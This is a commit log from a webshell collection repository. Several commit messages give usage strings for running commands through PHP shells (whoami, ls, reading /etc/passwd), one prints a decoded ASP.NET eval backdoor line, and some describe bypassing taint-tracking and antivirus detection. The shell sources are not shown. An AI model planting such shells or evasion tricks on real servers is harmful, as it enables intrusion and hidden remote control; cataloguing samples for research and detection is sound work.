tennc
|
43c3fd24a3
|
Create system2022-08-22-4.php
from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1=whoami
|
2022-08-22 22:42:23 +08:00 |
|
tennc
|
a5b681ccf8
|
Create system2022-08-22-3.php
from: https://zhuanlan.zhihu.com/p/550150061
__FILE__是PHP的一个魔术常量,它会返回当前执行PHP脚本的完整路径和文件名,我们利用substr()函数逆着截取,就能获得system再利用变量做函数的方式,打断了污点追踪的过程,进行命令执行,也可以成功bypass掉牧云引擎。
usage:
file:xxx.php
post: body==>1=whoami
|
2022-08-22 22:40:18 +08:00 |
|
tennc
|
615c74bdec
|
Create system2022-08-22-2.php
from: https://zhuanlan.zhihu.com/p/550150061
usage: xxx.php?1[]=system&1[]=a&1[]=b&2=whoami
|
2022-08-22 22:37:10 +08:00 |
|
tennc
|
c9540e5a85
|
Create system2022-08-22.php
from : https://zhuanlan.zhihu.com/p/550150061
该样本需要一些条件,前提是开启了php-xml拓展才可以,其原理就是用XML去注册一个registerPHPFunctions,也就是我们想要执行的system再利用getClosure去触发该方法而构成的webshell,其中即利用到了PHP的特性,利用registerNamespace和registerPHPFunctions来中断污点追踪,从而RCE
usage: xxx.php?3=whoami
|
2022-08-22 22:32:44 +08:00 |
|
tennc
|
a6e6672291
|
add msmap 2022-08-20 @hosch3n 👍
From: https://github.com/hosch3n/msmap
Author : hosch3n
|
2022-08-20 17:25:19 +08:00 |
|
tennc
|
1f2fc9c832
|
Update README.md
|
2022-08-20 17:21:44 +08:00 |
|
tennc
|
5142495a2a
|
Create README.md
|
2022-08-20 17:20:08 +08:00 |
|
tennc
|
39cf8cacca
|
Create simple_2022_08_15.php
running : system('cat /etc/passwd')
![img](https://raw.githubusercontent.com/tennc/webshell/master/php/Fig4-web-shell-example-2.png)
|
2022-08-15 00:46:41 +08:00 |
|
tennc
|
95f12107a7
|
Add files via upload
upload png with simple2022_08_15.php pic
|
2022-08-15 00:45:05 +08:00 |
|
tennc
|
d31dd250f0
|
Rename 2022-08-12.asp.txt to 2022-08-12.aspx.txt
decode core code:
608592;var safe="unsafe";eval(Request.Item['pass'], safe);1825776;
pass:pass
|
2022-08-12 00:54:31 +08:00 |
|
tennc
|
08dd7f3ed2
|
Update 2022-08-12.asp.txt
|
2022-08-12 00:41:23 +08:00 |
|
tennc
|
a778458785
|
Create 2022-08-12.asp.txt
not decode
|
2022-08-12 00:25:56 +08:00 |
|
tennc
|
8f9a481d39
|
Update README.md
|
2022-08-08 22:39:13 +08:00 |
|
tennc
|
19450447f7
|
Create WebSocket 内存马,一种新型内存马技术.md
from: https://mp.weixin.qq.com/s/XwWqTBeeaR9Vq8Htr2vKcQ
Author: veo
|
2022-08-08 22:33:21 +08:00 |
|
tennc
|
e4f97e3722
|
Update .gitmodules
|
2022-08-05 23:29:24 +08:00 |
|
tennc
|
45910b1865
|
Add files via upload
from: https://xz.aliyun.com/t/11391
author: suansuan
|
2022-08-05 23:24:59 +08:00 |
|
tennc
|
ddc544e992
|
Create 简单的冰蝎流量魔改.md
from: https://xz.aliyun.com/t/11530
aythor: Credink
|
2022-08-05 23:15:17 +08:00 |
|
tennc
|
9bb3f1b806
|
Create 几种实战成功过的webshell的免杀方式.md
from: https://xz.aliyun.com/t/10937
author: Icepaper
|
2022-08-05 23:10:13 +08:00 |
|
tennc
|
795d0a1039
|
Create LICENSE
|
2022-08-01 23:31:11 +08:00 |
|
tennc
|
ccba530eec
|
Update readme.md
|
2022-08-01 23:15:02 +08:00 |
|
tennc
|
3f960943e0
|
Update readme.md
|
2022-08-01 23:14:29 +08:00 |
|
tennc
|
21dbbbee7f
|
Update readme.md
|
2022-08-01 23:13:47 +08:00 |
|
tennc
|
bd7551a9db
|
Update readme.md
|
2022-08-01 23:13:01 +08:00 |
|
tennc
|
59be8c0a37
|
Update readme.md
|
2022-08-01 23:12:44 +08:00 |
|
tennc
|
a14652d3bc
|
Merge pull request #55 from foulenzer/typo_fix
fixed typo
|
2022-07-26 22:14:42 +08:00 |
|
tennc
|
36b676748f
|
Update .NET WebShell 免杀系列之Unicode编码.md
|
2022-07-26 13:28:26 +08:00 |
|
tennc
|
fc5099cf0d
|
Rename .NET WebShell 免杀系列之Unicode编码 to .NET WebShell 免杀系列之Unicode编码.md
|
2022-07-26 13:27:39 +08:00 |
|
tennc
|
cb5203e131
|
Create .NET WebShell 免杀系列之Unicode编码
Author:[dotNet安全矩阵](doNetSafety) WX公众号
|
2022-07-26 13:27:13 +08:00 |
|
tennc
|
996152da78
|
add wsmemshell
thanks @veo
|
2022-07-26 13:09:53 +08:00 |
|
tennc
|
1643b37786
|
add wsmemshell readme
|
2022-07-26 13:07:46 +08:00 |
|
tennc
|
e35c908f48
|
Create readme.md
|
2022-07-26 13:06:27 +08:00 |
|
tennc
|
638c20250e
|
Create LICENSE
|
2022-07-26 13:00:44 +08:00 |
|
tennc
|
6c7c4681fe
|
Update README.md
|
2022-07-26 12:59:37 +08:00 |
|
tennc
|
1ba4ac2b81
|
Update readme.md
|
2022-07-26 12:58:15 +08:00 |
|
tennc
|
062a4e2891
|
Create readme.md
|
2022-07-26 12:57:36 +08:00 |
|
tennc
|
710355afbb
|
Delete codeql-analysis.yml
|
2022-05-08 14:19:17 +08:00 |
|
foulenzer
|
11c12cca75
|
fixed typo
|
2022-04-12 09:37:10 -04:00 |
|
tennc
|
59661e7c8a
|
Update .gitmodules
|
2022-03-24 23:06:38 +08:00 |
|
tennc
|
09f16a51e5
|
Create codeql-analysis.yml
|
2022-03-24 22:58:33 +08:00 |
|
tennc
|
4d650897ec
|
Create 20220213_06.php
|
2022-02-13 22:38:53 +08:00 |
|
tennc
|
e421f51b5a
|
Create 20220213_05.php
from : https://github.com/eddie222-diamond/php/blob/main/head.php
|
2022-02-13 22:37:02 +08:00 |
|
tennc
|
9640d18e26
|
Create 20220213_04.php
|
2022-02-13 22:33:58 +08:00 |
|
tennc
|
b9f06d9682
|
Create 20220213_03.php
|
2022-02-13 22:28:25 +08:00 |
|
tennc
|
5f2e172790
|
Create 20220213_02.php
|
2022-02-13 22:27:55 +08:00 |
|
tennc
|
ccf2230bfa
|
Create 20220213.php
add godzilla php webshell
|
2022-02-13 22:24:49 +08:00 |
|
tennc
|
44e785c4cc
|
Merge pull request #53 from its0x08/patch-1
15 bytes long PHP payload to achieve RCE!
|
2022-02-12 22:32:50 +08:00 |
|
0x08
|
e12f91f024
|
15 bytes long PHP payload to achieve RCE!
Usage:
http://127.0.0.1/?_=ls
|
2022-02-05 20:01:07 +03:00 |
|
tennc
|
6a095d49ac
|
Create 20220206.php
35 bytes PHP backdoor protected by a password, supports arbitrary function calls.
/20220206.php?p=_&f=system&c=ls
|
2022-02-05 23:12:46 +08:00 |
|
tennc
|
4c180bb803
|
Merge pull request #52 from krishpranav/patch-1
perl web shell
|
2022-02-04 21:45:20 +08:00 |
|
Krisna Pranav
|
cb19bf2710
|
perl web shell
|
2021-12-28 19:56:11 +05:30 |
|